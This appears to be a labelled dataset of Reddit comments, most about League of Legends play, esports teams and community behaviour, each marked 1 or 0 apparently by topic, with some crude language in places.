1	By the far the best way I know to improve elo:     Queue with a friend! This will allow 2 players familiar with each other to coordinate possible ganks, make plays, push towers etc. More synergy than just random 5 players doing what they wish.   Farm farm farm farm farm farm farm farm farm farm, make sure you last hitting is on point! This is probably one of the most crucial things in the game. Even if you give first blood to your lane, if you beat them in CS you won your lane. 1 Kill = Average of 12~ CS   WARD! If your team isn't warding you better be buying MANY each time you can afford them to back.   Don't rage\argue with your team mates. This really is crucial I've found at the low "elo hell". If a team mate is dying repetitively try and just give them a tip. If they respond with "STFU NOOB" or something of that nature, don't mute them, instead just ignore their tough guy charade.   Finally the biggest influence you can make on a solo queue game is taking a major role. Not saying support, ad carry aren't necessary roles. For example, my friend and myself - I'll take solo top or mid, and he'll jungle. This allows us to coordinate very successful ganks getting myself or him fed which in turn we snowball and snowball well. If I get mid we'll duo gank top, making it a possible 3v1 or we'll take dragon with bot lane etc.     Hope this helps,
1	Hi I'm Neal aka SirDrinksAlot312 aka ManiacofOlympos. I am support main who doesnt play ranked. My rank is Bronze 1 for those who wonder but I havent played a ranked game since early Season 4. I play support or mid quite often.   I've been told I have a nice grasp of the game and a lot of game knowladge but I dont have the mechanics. My stream is mostly about fun games. If you want nice classic rock and me singing them so bad that would make the artists cry, you should tag along.   I try to teach the game to the best of my ability too with my limited mechanics and less limited knowledge. I stream every day at different times. I will brings some order to my chaotic streaming hours soon.
0	This issue is so convoluted that it has been almost impossible for me to form an opinion on it, being a pacifist. I understand what people have to give up and do, but at the same time I don't agree with their decision to be in the armed forces. There is also the fact that I think the War on Terror was and is a horrible idea. I understand that many people have suffered losses due to terrorism, but I find that the idea of declaring a war on an Idea is about as useless as shooting bullets through smoke. It seems to me to resemble Vietnam, when everyone thought communism was the big, evil, spreading superpower. We decided to try to play the heros and ended up in one big shit hole. I'm not saying that terrorism is exactly like communism, but there are parallels between the situation we are in now and the one we were in almost 60 years ago.
0	Question here: why is this an okay thing? I mean if you have a gay friend you painted x, why is it more valuable (on reddit) than if your straight friend did? Why does reddit go bat shit insane for gay rights? I mean, it's great, trust me I am very much pro-gay but then when I see reddit accuse OP of faggotry it pisses me off. We have images and gifs too, and it's the same narrow minded shit spewing as always, simply cause OP lied, reposted etc. A piece of shit by any other name is still shit, so let's at least try to play nice :)
1	Just because are queued up as a specific role doesnt mean that you can't pick another champ. You can't always play the champ you want because they just don't fit in the team comp and you are forced to play another champion that is more fitable. Lets say you want to solo top as Blitz and your AD Carry picks someone who is godlike with BLitz on bot (Trist (had great experiences with this comp)). You agree to go bot eventhough you had locked in on solo top. The support then agrees to solo top. This mix up will always occur.
1	The problem is occurring on multiple ISP's because they ISP's don't actually control their traffic from your house all the way to Riot's servers.  If you really want to get into it, [here is the wikipedia article] ( that describes how the data tiers and flow work.  Basically your ISP is likely a Tier 3 or possibly a Tier 2 provider.  They are passing data up to the Tier 1 providers who then transmit it back down to you and vice versa.   Riot has connections with multiple ISP's and has routes setup within the higher tiered networks to help provide a higher quality of service to you as a user, but sometimes this still does not guarantee that service will always be what it should be.  Riot is working with their providers and adding circuits in an attempt to help create the shortest routes between their customers and their servers, but that takes time and a lot of money.  I don't know what their lead time is or what infrastructure they have to put in place to make additions or changes to their networks, but for my company it is 60 to 90 days to get a circuit installed.  However, when we add a circuit, it doesn't have near the amount of dependencies that theirs will when incorporating load balancing and traffic flow.  On top of that they also have to test them extensively to make sure they are not impacting their existing infrastructure.   Another factor which is probably causing some issue is the growth of BGP entries in routing tables around the world which you can read about [here](  This has caused widespread issues around the world and is completely out of Riot's control.
1	I doubt there will be any specific pax based skins. I am guessing they will do what they did last year, give out a Riot skin and one other.
1	Your reasoning for having these accounts does not matter for my argument. I am reading what you are saying. And at least part of what you are saying is indicative of the problem that I have described.   Here, I'll even use your words from this post to illustrate my point.   "It is fun to win. It is fun to get super fed and carry hard. But it is not fun to do this over and over, I like almost every other player want variation in this game and life, because stagnant things are boring."  Now let's look at this statement through the lens of my previous post about the college basketball player going to whomp on kids on the playground.   "It is fun to win. It is fun to steal the ball from kids and dunk on them, because they do not have any semblance of a chance against me and my awesome skills. But it is not fun to do this over and over (just a few times is fine); I, like almost every other college basketball player want variation in basketball and life, because stagnant things are boring."   The point is not that you only play against people out of your league every now and again, or because of this reason or another. The point is that you (and so many other players in this game) find it fun to stomp over people who are inferior to you, which I consider to be a deplorable mindset.   Perhaps you should stop and consider just who is the asshole ... The person pointing out a behavior considered despicable in virtually every other facet of life, or the person who has stated openly they engage in and enjoy that behavior.
1	I'm from Ukraine and i'm ok. What war are you talking about? Russia just help us in this times....
1	1) In the specific situation you're talking about, if the enemy team is stacking MR as ahri you should be building sorc shoes (as always) and abyssal scepter is also very strong on ahri. In general, if you're not playing a tank, last whisper and void staff should almost always be a part of your full build (especially if mid or adc)   2) I dont know what kind of champions you play, but zed is really hard to deal with on pretty much any squishy. If you're playing an AP, make sure you get a scholar's armguard and an early zhonya's, this lets you dodge his ult's damage with the active really easily in addition to having armor. The thing about zed is that his skill cap is immense, so he can pull off some really amazing outplays (i.e. [this play by bischu])( so it's hard to say how to really deal with him. If you're playing ADC, it's really important to buy a QSS against Zed, as it removes his ult entirely.   3) Vision. If you're ahead, as you push up the map and take towers, your wards should be getting further and further up (i.e. once you take outer towers, you should have wards in their jungle). It's super important for supports to have oracles, right now it's really good because of it not disappearing on death. Also, NEVER do baron unless either they have people dead or you have vision of one or more players in bot lane or their base who doesn't have teleport. Getting a baron stolen or getting engaged on off of baron is one of the most common ways to throw the game. One more thing, NEVER go alone late game unless you're splitpushing. If you're going to ward baron or clear it as support, for example, you generally shouldn't go alone, as there's a really high chance you'll be walking over enemy wards.   That was really long...
1	Please do us all a favor and leave the channel and don't come back. If you play in the reddit channel and refuse to use mumble just leave. You will make it easier on the rest of us and will leave room for people who actually want to play together. The room hits the 200 person limit every night now.
1	I like it with events, but it would be neat if it somehow they figured out a way for you to be able to mystery gift someone on their birthdays. Like, a little present shows up on a players name on  your friend list when it is their birthday and you can right click it to go to the gifting page of the store if you want to send them something. (
0	I was on a business trip to a training class, and all the people attending stayed in the same hotel near the training facility. Everyone went out for drinks the night before class. The bus to take us to training was to be outside the hotel, and leaving at 8am sharp. Anyone not on it, missed the class. This was a big deal seeing as how the company paid for everything, flights, rooms, transportation, per diem, and the class. Well i got shitfaced. Like whiskey chased by beer all night shitfaced. Finished up at 2am arguing with locals outside. Made it up to my room somehow and passed out on top of the covers, completely clothed. I set no alarm. I woke up completely at 7:45am and made it outside to the bus at 8:01 when the bus started moving. They stopped and let me on. I threw up multiple times in the bathroom during training.
1	I think there is enough incentive to be among the best in the world that if you said to players like Froggen, like Rekless etc. that "we can make you good enough to compete with the best teams in the world, but you have to eat, sleep, train and live like a top Korean team to do it", that a not insignificant number of players would say "sign me up" without a second's hesitation.   Think of it this way, we have two training setups, A and B. A works well for Koreans, B works well for Europeans. Your logic is sound if Europeans cannot work under A (and Koreans cannot/do not benefit from B), that Europeans should go with B. But if you have say 10% of Europeans who are willing to act like Koreans for the sake of being the best, for that group of players A once again becomes the best.   For sure, some players might fall out of love with the game if they have to live like that, but some would be prepared to make that sacrifice to be the best, and I think someone like Froggen would certainly be prepared to live in a Korean style gaming house, if it were applicable to EU regarding infrastructure, organisational sister teams etc.
1	Yes i lost my promos to plat one because of server DC and riot doesn't give loss forgiven because it's bugged and won't do it for promos even if you petition them to on boards.
0	I think the issue is that most people imagining these scenarios live lives that involve problems that, by comparison with a doomsday scenario, are banal and largely superficial. Nevertheless, they still cause grief and consternation in daily living, and yet, we have little control over the resolution of many of those things. And there are too many rules governing day to day life, whether or not they are codified or merely required social graces.   "Will I get a promotion?" "Do I need to start looking for a new job?" "I don't like how much internet costs." "Health insurance is cutting into my disposable income a lot." "How do I get Sara from accounting to like me?"   Now, in an apocalypse, none of that matters. Now, if you die, nothing matters. If you live, suddenly you're one of the lucky few, the chosen. The world belongs to you and those you can protect. You grab a weapon and some ammo, boost that brand new Maserati you always wanted from the abandoned lot, and you save Sara from the horde of animated undead/evil aliens/kaiju.   Now you don't have to worry about whether or not Sara likes you, of course she does, you helped her to not die, nobody else did that. It doesn't matter if you get promoted, because your job is defending yourself and your friends from 'the enemy'.   Now the questions you're faced with are "Am I dead?" and "Are my friends dead?" And if you can answer those questions 'no' then, you win. You win at life, and nobody anywhere can say anything different.   So the bar is lowered as it pertains to those abstract, banal life issues. The strictures of society have been replaced with 'be a badass and do what it takes to survive'. For some people, those 'new rules' for living sound a lot more fun and interesting than the ones they have now.
1	Honestly I've never farmed as hard as I can farm with karma. 300 cs in 25 minutes at 1200+ elo is not too bad. It's no scarra's karthus but I'll take it. Also, the lack of ultimate is true you pretty much have to farm like a beast to stay relevant compared to a typical ap mid IMHO.   Now that as an aside she needs a specific team comp for her kit to be really effective. A very in your face tanky/bruiser comp with an up in your face ad carry like vayne would be best. Another problem is that spirit link is not reliable damage source as it does not damage the targeted person so it has to be used more intelligently to effectively burst someone down. Another issue as most karma players will attest to is that the unreliable damage from spirit link and the mantra requirements on her shield for it to do any damage at all.   So with only one guaranteed damage source I feel she falls short in both reliable burst and sustained damage. She must sacrifice a charge of mantra for her heal which, with high ap and on low health high hp targets. Her heal could be considered gamebreakingly OP on the right team comp especially one with their own sustain.(vlad and warwick come to mind)   Her plus side is that, as I've said in the right comp she could take a snowball team and her high damage and utility could easily carry her team to an early game victory. Spirit link plus her burst from shield/heavanly wave. Is just downright amazing for ganks and team fights. The amount of control and utility you bring to the table is amazing as well as her shield becomes insanely beefy late game once you've got your core ap items.   Another quick thing to note is that she also makes and I know people are gonna laugh. But she makes an amazing ap mid/lategame support. run a tanky kill lane bot(leona and/or Jarvan) and a ranged ad and ap top and/or jungle.(tanky ap jungle would be nice like sejuani and her kit synergizes well with karma.) This is an effective team for breaking up the old ap mid support ad bot bruiser top meta. But might lack the speed and map control necessary to control the jungle as seen in Hanover and Kiev.
0	Just fuck you all. You are failing at "picking up girls" because that's how you see it. You aren't looking to make a bond with anybody, you're just hoping to release all that pent-up porn-fuelled sexual tension. When you realise that girls are people with tastes and distastes, and the fact that you are the type of guys that spend all day making sweeping generalisations and making excuses for yourself leaves very little to be desired about you. (Irony intended)   Getting bummed out because your wall-of-text confession of attraction backfired? Hating on that guy she's with in a picture on Facebook? Tip: Be that guy. Put yourself into social situations. Be seen. Be heard. Stop sitting quietly in the corner assessing and judging everybody.   Looks do not matter in the same sense that you aren't instantly attracted to the spotty fat girl. Of course looks matter, but if you spend all day drinking litres of coke and rubbing your greasy hands all over your face then your looks are going to suffer. As long as you present yourself well, you can look however you like; I've seen all manner of guys with hot girls, and  personality trumps looks. EVERY. DAMN. TIME.   I am absolutely sick to death of seeing Redditors make excuses for being a mid twenties virgin based on assumptions of the opposite sex being vacuous and unable to see your inner strenths? What inner strenghs? An unmatched skill in passive agressive quips?   It's the same with these memes: "Hey girls, if you like us, tell us!". Stop being a pussy. If you like her, tell her. Tip 2: To her face you fucking pussy.
1	I had a kind of similar sad story. First up I was in a soloq game, called jungle and it has not been picked when me (3rd) and our 4th pick could pick our champs. Me scrolling through my champs, having about 5 sec left, the 4th player picks and locks Evelyn jungle :O (Nothing wrong with evelyn jungle I just had no idea where to go now) That kinda confused me and I failed to pick a champ and lost 3 LP. Well happens thats all cool.   Few days later I was going to do a duoq match with a friend of mine in his promotions. We got 2 people mid and they started raging and trolling so I left for my friend loosing another 3 LP (Im fine with that).   Next up a few days later, still without having done a ranked game in a while, I duoq with another friend, and 2 times in a row my client crashed in champ select :(. (So I lost 6LP, making it 12LP loss without playing a game).   This morning I was playing a match of ARAM, and I noticed I had -1 LP. That being because I didn't play a ranked game for 7 days, and thus making me loose another 10 LP. Soo I did want to play a ranked game, but first the community and myself didnt let me, and then riots client didnt let me.
1	Cut regi some slack please. He might seem unreasonable in some arguments but he lives for his team. He takes all the shit for the team and is the shotcaller. Responsibility in- and outside the team. Thats a hard load to carry.   Im sure there are a lot of friendly moments within the team gamecrib does not show. 2 Arguments in 2 Weeks isnt that much (hey, maybe its more but who knows) and as long as tsm get their performance back in shape, its all good.   Every1 in the team is having a tough time with the recent losses, so obv they are tense and irritable.
1	here:   scroll to the max right and you'll see 2 columns: time, and max creep score.
0	A Terms of Service contract doesn't necessarily hold up in court, regardless of what it says you have agreed to in order to use their services. Hyperbolic, but if YouTube said they're allowed to shoot you in the face if you agree to their TOS, U.S. Law trumps it by a mile.   Been several years since I created my account, but I went to 'Create an Account', and it looks like you don't even agree with YouTube's TOS, but with Google's.   YouTube's TOS is still [present and available]( but appears to be a Browsewrap; that is, you don't physically agree to any of those conditions, it is more or less implied, but makes it incredibly difficult to hold up in a court of law.
1	I think that you leaving the game wont hurt anyone. I for one do not need people that are toxic in ranked.   Furthermore I think that banning people from ranked is 100% logical. You see, like you said, it is frustrating for you to not  be able to play ranked. What we can deduct from that is that you like to play ranked. You like to climb the ladder and you like to win in a competitive environment, right? So because you are toxic to your teammates and you break the summoners code, since you clearly cannot control your rage, Riot takes away what you like to do ( ladder climbing, playing competitive ) as a punishment.   You see, when you want to punish someone you have to figure out what they like to do. When you figure that out, you take it away (in ex: Someone who loves to ride around on his bike will be greatly punished, should you take that bike away). Now, what Riot does is they give you incentive and motivation to improve. If you do the X amount of ranked restriction games to redeem yourself ( like Riven ) you will be able to play ranked again, or in other words, through redeeming yourself and reforming your attitude, you will again be able to do what you like: Climb the ladder and play competitively.   By deciding you wont change like you did, you wont benefit at all. You will continue to be chat and ranked restricted. You will be permanently deprived of the Ranked queue which is the one queue you like to play the most, but because you cannot control your attitude, you cannot have it.
1	Imo, the way riot has done their pricing, people who have been waiting for pulsefire are getting quite the deal because they are most likely getting it during the first couple of days meaning they get a sale price lower than that of a standard legendary (cough "magnificent" TF"). However, due to the work that riot has put in, i feel like the increased rp price is justified. 3250 is a little steep for me but think about it, the people who want the skin are getting a great deal, people who arent getting it are the ones bitching becasue they want to nitpick on everything.
0	Do you realize you are in Adviceanimals? I realize we dropped the "animals" pretense some time ago, but this isn't even a recognizable image macro.
0	You're partially right. They wanted to talk about things they wanted to talk about, but people used it as a place for open discourse. As a place for open discourse, things that were off the wall would get downvoted (for example, recently someone tried to use a nationalist hate site as a citation to prove to me Islam was being catered to, or a link that was over ten years old and not updated for "Gotcha!" points without realizing the information predated the laws we were talking about). I really enjoyed it, because A. I turned around a few people's debate style while there and made them use honest sources instead of blogs or spam, and B. Seeing what was going on in the conservative sphere was very interesting.   So, yeah, people were downvoting things, but as far as I could tell I never saw mass downvotes (3|100 or anything like that). Just lots of posts arguing.
1	I'd say it has more to do with the current FOTM. Assassins seem to be big right now, so we see them more as well as a lot of CC to help them do their job. Some picks, like Shen and Karthus, are inherently strong because of their kits; the only way that they would fall out of favor is Riot remaking them, which isn't going to happen.   We didn't see many assassins at all at S2 Worlds even though many popular champions (Eve, Diana, Kat) were just as powerful then as they are now, if not more so. The DFG was significantly more powerful then, too. The only significant difference between the S2 Worlds patch and the Elise patch are the new champs and nerfs to Sona (giving her less effective level 1 health than a melee minion), Ezreal, and a few others. Leona, a popular pick at Worlds, has barely been picked at all at IPL despite the fact that she hasn't changed a bit while Ezreal and Sona are still seen pretty often despite their nerfs.
1	Hi <pro player> just wanted to say I love your play and good luck in <big upcoming tournament>!   question or gtfo seems rude in a "make me popular" thread   Hey what do you think of <champion> in <unconventional role>? because its true. especially in low elo   Any tips for getting out of Elo hell? l2p retard seems inappropiate   How do I go pro? do you have anything to add to that?   <Witty comment concerning recent play or event involving <pro player>> not a question, so a bit smalltalk seems nice   Which team / player / champion do you hate the most? i dont think its good to say that you hate some teams, and i dont agree with the champ thingy you wrote   What do you think of <competitor pro team>? they are professionals. they cant call a random team bad or sth like that. that always returns back.
1	Hmm.... Basically, someone wanted to make something special for his friend, who's awesome. He decided to post on the LoL's boards to ask Riot and players if they wanted to send mystery gifts to his friend. That post got a lot of attention, and Riot indeed sent a mystery gift to that friend, which is a really nice thing, imo.   But then, as it was getting more and more attention, someone else posted on Reddit that they were that one guy who asked for Riot to make something special for his friend. But it obviously was a fake, as the grammar/punctuation were a lot worse than the original, and he was asking for a Paypal donation.   Then, I asked the original post's owner if it was him, just to make sure. And it appears that it wasn't. So, it was a fraud. Case solved. :D
0	I was bullied for the first half of sixth grade because I was short and skinny.   One day I got shoved right as I was going outside for recess by one of the most popular kids in school. He shoved me in the middle of a large crowd of our peers and I had this moment of clarity where I knew what I had to do.   I told him what I wanted to say in a very calm but VERY loud voice so that everyone already outside and coming out of the building would hear and turn towards us see what was going on, and they did.   I told the guy that if he wanted to fight, fair enough, I would fight him. Right here, right now, with everyone watching. I told him that I wouldn't take it easy on him, and that he had no idea what he was getting into. If he wanted to take that chance, then this was his opportunity.   Another kid had tried to sucker punch me in the face earlier that week during recess and I had grabbed his fist out of the air mid-punch and just stared at the guy who did it with a burning anger in my eyes (I might have been small but goddamn if I don't have ridiculous reflexes). This gave me confidence. I knew that the bully I was confronting now had seen me pull off this ninja shit earlier, so he knew I wasn't fucking around and that I wasn't as weak as I appeared.   With everyone in our grade slowly gathering around us, he decided that the chance of his ego and face getting bruised in front of our peers was not a risk he was willing to take. There were some other people who were friends of his who were in this crowd who had bullied me that year as well. They all took note.   I never got bullied again, all through high school they remembered that I wasn't a pushover and never again did I get shoved or threatened.
0	I make a living on art. Honestly I think it is way easier to find a job in art if you mix it with something more technical. Digital artist isnt exactly the easiest gig to land, but its a whole lot more of a 'career path' than lots of other artistic offshoots. I left my job to take care of my daughter full time for a couple years, but I still get easy 40hrs/wk of freelance work making characters for games.
1	While it can be argued that gaming can cause addictions that are similar to gambling and drug abuse, there is a very large grey area on the subject matter of how a government is supposed to respond to these types of problems.   Sure the drinking age is 21, but there still are alcoholics that ruin lives one way or another. Sure the smoking age is 18, but it still destroys your lungs and your wallet regardless of age. There are countless examples and counterexamples for either side and it is up to the people to support the laws or change them (I am an American so I am used to the democratic process even though it is heavily corrupted).   In the end, it is up to the people to make decisions on these types of activities, whether it be gaming or drugs and alcohol. I do believe that the Korean government is overstepping their bounds when it comes to restricting the amount of time that a teenager can play. IMO, that is the parent/guardian's job, not the government's job, but it seems that it has come to the attention of the Korean government that despite the parents' effort, gaming is becoming an addiction that is gripping the youth and effectively lowering the country's future net worth when it comes time for them to grow up and "contribute to society."   I was, and possibly still am, addicted to gaming. It is a drug in the sense of the control it has over your life. You  can  be addicted to it, and if you are, it  has  the potential to ruin your life. I almost failed out of school because of it. Gaming addiction is no joke for those who are trapped and having support from your loved ones, just like any other addiction, is the best way out of it. In the end, the individual has to want to break the addiction. If I had impositions on how much I could play, I probably wouldn't have been so deep into it, so I see the thinking behind the concept of the potential law. It doesn't make it right, but I understand.
1	i feel u. i mained support ever since playing ranked i liked to "carry" my team by winning the vision war(which is reasonably easy in silver,but yeah).   pretty much as a support i did ward scout look out for opponents,not that I can only place 3 wards and most likely my silver teammates wont even use their free trinket ward,this is no more....   i really feel like support got a lot more boring in terms of actually "supporting ur team". ur now more of a  super squishy,mostly ap carry,since u cant build any real defense or ur dmg will be so low that it doesnt even matter...
1	I would say his community is a bit different in the way that speed running community is about 99% stream based and other then speed running themselves which little actually get into watching and the chat is the one way they get to experience it. While LoL is a community of millions in which streaming is very in important to many as they rarely watch (while yes their are many regular stream watchers, a lot are also there just because they are randomly bored.) So around half the people don't care about their experience as they do not experience it but once in a little while, while the other half suffer. You can tell the community has a lot of random viewers by the way the viewer count fluctuates so much on LoL streams from about 1k to 10k while someone like Cosmo has a more steady count around 3k (haven't watched him in a while but it was when I watched)
0	God yes.  There was a thread in another subreddit a couple years ago, where women were saying not to wash their labia.  I explained to them how that's bad hygiene, and you can get infections and such that way.  You would have thought I told them they should all get their clits torn out with pliers.  One girl called me 'insensitive', then got mad when I told her she was the 'insensitive' one by forcing everyone around her to smell her funky pussy.  (She admitted to having funky pussy smell everyday).  I've taken classes on human health and hygiene.  I have consulted with many OB/GYN's because I've worked with teen girls in group homes, who had STD's, infections, and other problems.  I have never heard from a legitimate health professional that you should only wash your labia with water.  I have always heard that you should wash with a gentle soap, and warm water.  And you need to wash all the folds, to remove the bacteria.   But no, these girls had to quote some Cosmo article or something, claiming washing labia with soap is dangerous.  I hope they enjoy their infections, and lack of sex.
0	I don't have a problem with Halloween as long as you don’t have a problem with Christmas.   I’m not really big into decorations. I don’t decorate for different holidays. I barely even decorate my room. But I don’t mind that most people do. From mid-October until after January 6 it seems most houses have all kinds of decorations in- and outside, from the Charlie Brown motif with scrawny tree to that of National Lampoon’s Christmas Vacation style.   I grew up in a Southern Baptist church and we celebrated a “fall festival.” It was basically the same thing as Halloween but without the name. There were still pumpkins, candy, and costumes. I don’t recall any Bible stories being told. There was even a “scary house” which made use of the patricians and created a haunted house in the fellowship hall. Basically Halloween, complete with trick-or-treating and haunted house, just with a different name. That never really set well with me.  Even to a elementary school kid, I didn’t understand why merely changing the name made so-called evil things ok. Semantics don’t sanitize a thing. So if Halloween & its festivities really are evil, then these actions don’t do any good and actually lead to more harm.   My parents never taught that Halloween is evil. Just like they didn’t teach me about the Easter Bunny, the Tooth Fairy, or Santa Claus. I knew these things existed, well, not really existed, but the idea of them existed was prevalent among my peers.   There seems to be a lot of people in the Church that preach Halloween as evil, that’s it’s the Devil’s New Year, that it’s full of demons, and they would never let their kids get wrapped up in such pagan rituals.   While it’s true that Halloween pulls from the ancient pagan holiday of [Samhain]( That is true, but it just look at the name “Halloween,” it derives its name from the Hallowed Evening before [All Saints Day](   Most of our holidays have both sacred and secular traditions. And that’s where my problem lies. Pretty much all the people (and every one I’ve known) that say Halloween is evil are the same people that put up Christmas trees and hang wreaths, both of which has pagan origins.   Ancient Romans decorated trees for their [Winter Solstice]( Holiday, [Saturnalia]( Ancient. Ancient Germans & Swedes used wreaths to celebrate the new year, or rebirth of nature or the sun.   So if one doesn’t celebrate Halloween, then it only stands to reasons not to put up Christmas trees or wreaths. I’m sure we could find many more pagan origins to stuff we believe or practice. Some of them very well may be types or redemptive analogies placed by God.   It’s not really the tradition that matters. It’s not really the actions that matter. It’s the motive behind the reasons and the importance we place on those actions.
1	I think he will perform very well as an analyst as he has all the correct raw components for this. I would much prefer a sports coach as coach of team   A sports coach?  No, the coach NEEDS a background in league of legends, or at the very least e-sports.  If he had some random athletic sports background, the players he is coaching will not fully respect him/listen to him.  I mean if it was Bill Belichick, or some other sports God,  they might respect him, but those guys are few and far between, and the players still might not respect him because he doesn't know shit about league.   Monte is gold elo I heard, but the players  respect  him because he displays his analytic skills and game knowledge while casting for the most talented region playing league currently.  If they didn't respect Monte, despite all of his game knowledge, he would be useless as a coach.
1	I don't get why people are so prone to getting butthurt. It's an online video game. What do you expect ? People will rage and curse and say stuff they would not have the courage to say face to face because they ARE SITTING BEHIND A KEYBOARD. Yes, the 13 year old, preteen, ragekiddie has just insulted you. So what ? Press the fucking mute button and move the fuck on. There's no point in going all policeman on their asses and trying to get them banned. Seriously, don't you have better things to do then consider how to respond to a mad person whom you will never, ever speak or play with again in your life ? Like maybe, just try to enjoy the game or focus on your own play and improving. Why anyone is putting this much thought and effort into curbing the rage is beyond me. Just to clarify, raging and trolling are 2 very different things. One of them ruins the game completely for all parties involved. The other is just a frustrated person venting their anger and can be easily avoided with the press of a single.fucking.button.
1	I wouldn't wait a second to ask Zoro if I was CLG.  He has everything they need, synergy with the jungler(thats super important), mechanics, meta champions, and as far as I know he has a pretty good attitude.
1	One that springs to mind was Dlift stealthing into a grouped enemy (I believe it was against Curse? Not sure, maybe game 2/3) and opened up spray and pray and just got deleted.   Thats exactly one of them you dont understand. You clearly lack gameknowledge to comprehend this decision. Look at their teamcomp, now look at the enemy teamcomp? What does each excel at? In case you havent noticed, Crs = Splitting, CLG = Picks.   CLG had no hard engage, no sieging potential to hit the tower and their only way of ever getting a tower was getting a pick. They repeatedly picked Quas that game with the Twitch, but could never convert due to their bad draft, since they couldnt siege. The one and only engage they had was a Twitch opener, which in the end didnt work out, again because it isnt an optimal choice for engage, but the only one they had.   I can very well deny that Doublelift "played terribly", thats a huge overstatement. He didnt play up to his expectations, but he still outclassed more than half of his opposition, plus ppl dont give him any credit for the playoff games he did well in (which includes this Twitch game you mentioned).   And btw, Impactful is nowhere near unknown, you should study up on players before you say that, because thats something Id take as offense if I was Impactful.
1	You should strive to atleast be decently farmed. Marksman scale mostly with gold, so an underfarmed adc will alwas lose to an underfarmed mid/top.   For your team to be at an advantage, you only really need to out cs your opponent, but you do need to be relatively fed to be relevant.
0	ya, sadly that's true.  experienced it first hand.  there's a study i read about that men become close friends with a girl ONLY if there is some underlying sexual attraction.  most of the time the girl has no idea and while she may find him attractive, she genuinely never frames the situation as a potential courtship.
1	The reason they got so much backlash from the community, at least from what i've heard, is because of how unfairly the Dreamhack manager handled the situation. Firstly, it took LDLC 6 hours to get a response on their accusation. How long did it take Fnatic? 30 minutes. Also, the Dreamhack rules stated that any rounds in which an exploit is used by one team, that round automatically goes to the other team, so LDLC should've won by Dreamhack rules. Secondly, they would've remade the match from 0-0 instead of 12-3 (Fnatic started using the boost in round 16), and this creates an unfair environment as it would only prompt Fnatic to use the boost again if they start losing. Lastly, this is an exploit, as in something not meant to be in the game. It's comparible to the Ashe AA bug, or the BotRK bug that was in the game a while back. It was unsportsman-like for Fnatic to use this glitch (often refurred to as 'pixel walking'), and Fnatic should've reported this to Valve once they found out about it.
1	The problem with Frozen Mallet is that it costs quite a lot, and inefficient.  This is meant to balance the item out, because it's a permaslow on an item.  In higher elos, I'd imagine they're more oriented on getting as much of a stat advantage up on the enemy laner (forget about getting it in a reasonable amount of time on a jungler) with as little gold as possible.  Not a bad item, but it's more snowballey than anything else.
1	I just I just recently started playing Lee Sin as a jungle main. I had to play against an Udyr who power farmed as usual and would come out for good ganks. It got to the point where he rushed Triforce and had Feral Flare already and he could just run out and chase everyone down. The only thing I can think of in this matchup is to try and gank hard while he farms and punish him for not helping as much. But if my ganks are unsuccessful then I'm stuck not scaling into late game while the enemy team kills my laners.   Any help here?
1	Just work on improving your own skills last hitting map awareness and positioning. Dont worry too much about your team mates and if you do give them advice do it in a nice way. Also dont get phased when a team mate or enemy bashes you in chat there will always be trolls. Dont feed the trolls it only fuels them and detracts from your focus. You will win some and lose some dont let your fear of losing elo discourage you from playing. If you hit a long losing streak maybe take a break and assess what you might be doing wrong and work on it.
1	The thing is, what's viable/competitive now won't necessarily be viable/competitive weeks or months from now, so it's hard to make recommendations based on that. The best thing would be just to try champions during free weeks and buy the ones you find fun. A lot of people get hung up over who the flavour of the month champions are, or what champions are "hard counters" to other champions, but that doesn't really count for much if you're playing a champion you're bad at just because someone says they're good.
0	Tvlicensing UK are a joke. When I was in first year at Uni, I lived in halls and tvlicensing send out a universal letter to every person in halls warning them that they are 'under investigation for watching tv and not having a tv license'. I was one of the many that didn't have a tv and rarely watched live tv so didn't need one. My flatmate had a tv and had a license to watch live tv on it. He got a shit load of letters from them whereas I only got one or two.  I think they're just trying to scare people into buying them even if they don't require them. They're a total joke.
1	First of all dont write something like i wish my team would stop dieing in all-chat.That just puts you into a bad spotlight for the enemy and your team. When someone on your team is afk since the first minute or ragequits just write in all-chat pls report  __  for ragequitting/afkeing. I personally don´t report people that apologize and come back into the game.   When someone on your team is afk just continue playing your game, try to motivate your team but dont start flaming or feeding intentionally. When the enemy team starts getting rude and says something like haha noob team losing i honor (afker) and stuff just report that person.
1	I'm sorry but everyone saying C9 is doomed without Hai is delusional. Yes, it is true Hai has godlike shotcalling but clearly, his mechanics and champion pool are lacking and they're not improving.   C9 could bring any midlaner to the team they wanted from the western region, apart from Bjergsen and Febiven since I doubt they'd want to leave their team, especially Bjergsen. Now, C9 could easily grab a midlaner with world class mechanics and teach him how to shotcall. Maybe he'll never reach Hai's shotcalling ability, but it would be more than enough, from what I understand, Lemonnation also did part of the shotcalling.   If you don't believe this, we can just look at TSM. Regi has clearly the heart off TSM but we recognised that the team hit it's peak with him on the team and decided to step down and bring in Bjergsen. Could he shotcall when he first came in? No. Can he now? Yes, perhaps the best shotcaller behing Hai.   If this is true and Hai really is stepping down or getting benched or whatever it is, I'm only surprised that he is moving out. Hai would probably be one of the best coaches in NA in my eyes and could help the new midlaner, if there is one, with shotcalling and to get used to the team environment.
1	You can say that S2 has a bad rep or LoL has better advertising, but what it really boils down to is that LoL is the first moba that has an easy learning curve. Starting out you face people with similar skill base. In HoN everyone is better than you if you've never played a moba before.
1	In the early years of LoL, he pretended he was a girl named Jenny. Pretty self explanatory. He also had tons of smurf accounts which he used to spam the league forums with things bringing up his name. He has basically no friends on NA anymore so he plays on the TW server.
0	Man, I ran into a guy from high school on the train one day and we chatted, he was captain of the varsity football team when I was playing freshmen football way back when. We talked he told me all about his wife and what he had done since high school, we exchanged stories and phone numbers, I thought I had made a friend cool right?   Well he asks me to go get coffee with him and his wife and we are chatting about aspirations and suddenly it starts to feel scripted. He started talking about "Rich Dad Poor Dad" and how he and his wife buy directly from companies as opposed to going through distributors. At this point I thought if he gives me a disk or reading material I'm out. So I suffer through his talk until I have a legitimate reason to leave, when I do he gives me this disk (don't remember what exactly it was, I immediately tossed it). I was so pissed, I had honestly thought I had made a new friend and he was just trying to sell me on one of these schemes.
0	My boyfriends really good friend was like this all the time. She would talk to me non-stop about he ex, money issues, family issues, ect. But then it got worse when she would constantly say how much better she was than me and everyone else and I eventually stopped talking to her, only to recieve contstant messages of her trying to bully me into submission. She actually told my boyfriend that I was doing to her what she was doing to me.
0	Hence the term
